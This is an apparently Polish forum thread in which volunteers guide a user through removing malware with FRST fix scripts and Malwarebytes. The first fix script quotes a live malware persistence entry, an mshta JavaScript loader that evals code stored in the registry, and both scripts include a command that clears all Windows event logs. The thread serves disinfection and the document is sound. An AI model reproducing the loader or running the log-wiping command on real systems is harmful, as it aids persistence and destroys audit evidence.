Wirusy po instalacji instalatorów

[ciaciek1991]

Witam, wczoraj mój brat ściągał jakieś programy, oczywiście myślał że ściąga programy jednak były to "śmieciowe" instalatory które instalowały jakieś gry, jakieś oprogramowanie antywirusowy , operę itp, większość usunąłem przez programy i funckje jednak chciałbym mieć pewność że jest czysto, korzystam na komputerze z przelewów itp wykonałem skanowanie malwarebytes, raz usunąłem jakieś PUP z rejestru, za drugim skanowaniem wykryło trojany w lokalizacji:

C:\WINDOWS\SYSWOW64\CONFIG\SYSTEMPROFILE\APPDATA\LOCAL\MICROSOFT\WINDOWS\TEMPORARY INTERNET FILES\CONTENT.IE5\0PS72R2M\RUPP[1].EXE 
C:\WINDOWS\SYSWOW64\CONFIG\SYSTEMPROFILE\APPDATA\LOCAL\MICROSOFT\WINDOWS\TEMPORARY INTERNET FILES\CONTENT.IE5\62AXOPQ5\YY2017[1].EXE

je również usunąłem. Daje logi do sprawdzenia i czekam na instrukcję i być może wiadomość że jest ok Pozdrawiam.

Ps. celowo nie mam antywira ze względu na to iż racjonalnie korzystam z internetu, jak widać inni użytkownicy mego komputera nie

FRST.txt

Addition.txt

Shortcut.txt

[Miszel03]

Ps. celowo nie mam antywira ze względu na to iż racjonalnie korzystam z internetu, jak widać inni użytkownicy mego komputera nie 

 

Jestem w stanie w to uwierzyć, bo system oprócz ostatnich wywijasów wygląda na czysty i "niezawalony". 

Mimo wszystko, dzisiejsze oprogramowanie antywirusowe wcale nie utrudnia korzystania z komputera i nie widzę powodu, dla którego nie miałbyś go używać. Proszę rozważyć instalację.

 

---

 

Widoczna jest jeszcze infekcja wykonywana z klucza. Przeprowadzimy dezynfekcję, a przy okazji posprzątam resztki po programach - m.in po przeglądarce Mozilla Firefox, a także martwe wpisy / skróty. 

 

1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść:

 

CloseProcesses:
CreateRestorePoint:
HKU\.DEFAULT\Software\Classes\7c7c: "C:\Windows\system32\mshta.exe" "javascript:B4aiH="jO";f4V3=new ActiveXObject("WScript.Shell");DGfa2RQ1="Wr5ul6";bOPA04=f4V3.RegRead("HKCU\\software\\wkxl\\pift");lku2oHlD="2";eval(bOPA04);eQ0yj4="2VWz";" 
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku
AlternateDataStreams: C:\ProgramData\TEMP:B755D674 [352]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
S4 xhunter1; \??\C:\Windows\xhunter1.sys [X]
C:\Users\Kamil\AppData\Roaming\VOS\HDDRegenerator\%Common StartMenu%\Programmi\HDD Regenerator\HDD Regenerator.lnk
C:\Users\Kamil\AppData\Roaming\VOS\HDDRegenerator\%Common StartMenu%\Programmi\HDD Regenerator\Readme.lnk
C:\Users\Kamil\AppData\Roaming\VOS\HDDRegenerator\%Common DesktopDirectory%\HDD Regenerator.lnk
DeleteKey: HKCU\Software\Mozilla
DeleteKey: HKCU\Software\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Mozilla
DeleteKey: HKLM\SOFTWARE\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla
DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org
DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins
C:\Users\Kamil\AppData\Local\Mozilla
C:\Users\Kamil\AppData\Roaming\Mozilla
C:\Users\Kamil\AppData\Roaming\Profiles
VirusTotal: C:\Windows\SysWOW64\Drivers\U3sHlpDr.sys
Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}
EmptyTemp:

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 

Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

 

2. Ponów całościowy skan za pomocą Malwarebytes. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 

 

3. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

[ciaciek1991]

A więc tak, malware już nic nie znalazł wykonałem powyższe kroki, wylogowało mnie ze wszystkich stron gdzie byłem zalogowany na chromie, pewnie to wynik działań frst ale nie przeszkadza mi to bo wszędzie miałem podpowiedzi logowania logi dałem w załącznikach, dziękuje za dotychczasową pomoc

Fixlog.txt

FRST.txt

Addition.txt

[Miszel03]

Wszystko pomyślnie wykonane. Infekcja zdjęta. 

 

Zastanawia mnie tylko sterownik U3sHlpDr, gdyż:

     - widoczny brak podpisu cyfrowego, 

     - data utworzenia zbiega się z czasem infekcji, 

     - sterownik sypię błędami w Dzienniku Zdarzeń. 

 

lecz żaden z silników na VirusTotal nie wykrywa go jako zagrożenie, a po za tym oznaczony jest jako sterownik INTEL (choć nie widzę jego śladów). 

Skonsultuje to z picasso i dam znać. Napisz czy problemy, z którymi się do nas zgłaszałeś ustały.

[ciaciek1991]

Tak, już jest wszystko OK, dzięki wielkie za pomoc :-)

 

Czekam na wieści dotyczące tego sterownika, bo sam jestem ciekaw :-)

Edytowane 13 Lutego 2018 przez Miszel03
Poprawki posta: formatowanie, bo coś się chyba rozmazało + pisownia. //Miszel03

[picasso]

Ten sterownik wygląda na część programu związanego z dyskiem USB ("USB Flash Disk" / "USB Flash Memory Password Utility"), a oznaczenia "Intel" na VirusTotal nie odnoszą się do marki pliku lecz do typu procesora maszyny docelowej. Jest blokowany przez system, bo to stary 32-bitowy plik bez podpisu:

 

Dziennik System:
=============
Error: (02/12/2018 10:42:31 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Nie można uruchomić usługi U3sHlpDr z powodu następującego błędu:
Nastąpiło zablokowanie ładowania sterownika

Error: (02/12/2018 10:42:31 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: Ładowanie sterownika \??\C:\Windows\SysWow64\Drivers\U3sHlpDr.sys zostało zablokowane z powodu niezgodności z tym systemem. Skontaktuj się z dostawcą oprogramowania w celu uzyskania zgodnej wersji sterownika.

 

Czyli sterownik do usunięcia, ale z powodu tego że i tak nie działa.

[ciaciek1991]

Usunąć ręcznie czy zostanie przedstawiony skrypt ?

[Miszel03]

Tak, przygotowałem skrypt (gdyż przy okazji znowu wyczyszczę Dziennik Zdarzeń, żeby nie widniał tam ten nieaktualny błąd). 

 

1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść:

 

S2 U3sHlpDr; C:\Windows\SysWOW64\Drivers\U3sHlpDr.sys [7423 2018-02-10] () [brak podpisu cyfrowego]
C:\Windows\SysWOW64\Drivers\U3sHlpDr.sys
S0 MBAMSwissArmy; System32\Drivers\mbamswissarmy.sys [X]
Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}
Reboot:

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 
Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Przedstaw go.

 

2. Na koniec zastosuj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne jak i system Windows.

[ciaciek1991]

Reszta wykonana, chyba wszystko? jeśli tak to dziękuje ślicznie za poświęcony czas

Fixlog.txt

[Miszel03]

Tak, to wszystko.

 

Miło mi, że mogłem pomóc.